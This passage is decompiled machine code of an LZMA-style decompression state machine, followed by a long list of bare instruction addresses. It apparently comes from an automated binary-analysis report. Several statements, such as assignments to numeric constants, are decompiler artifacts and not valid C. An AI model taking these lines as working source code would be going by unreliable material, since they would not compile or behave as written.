							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407175
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x00000000
                                                                                              0x004075cf
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00000000
                                                                                              0x0040743e
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00407601
                                                                                              0x004070bf
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x004075e5
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x00000000
                                                                                              0x004075f6
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
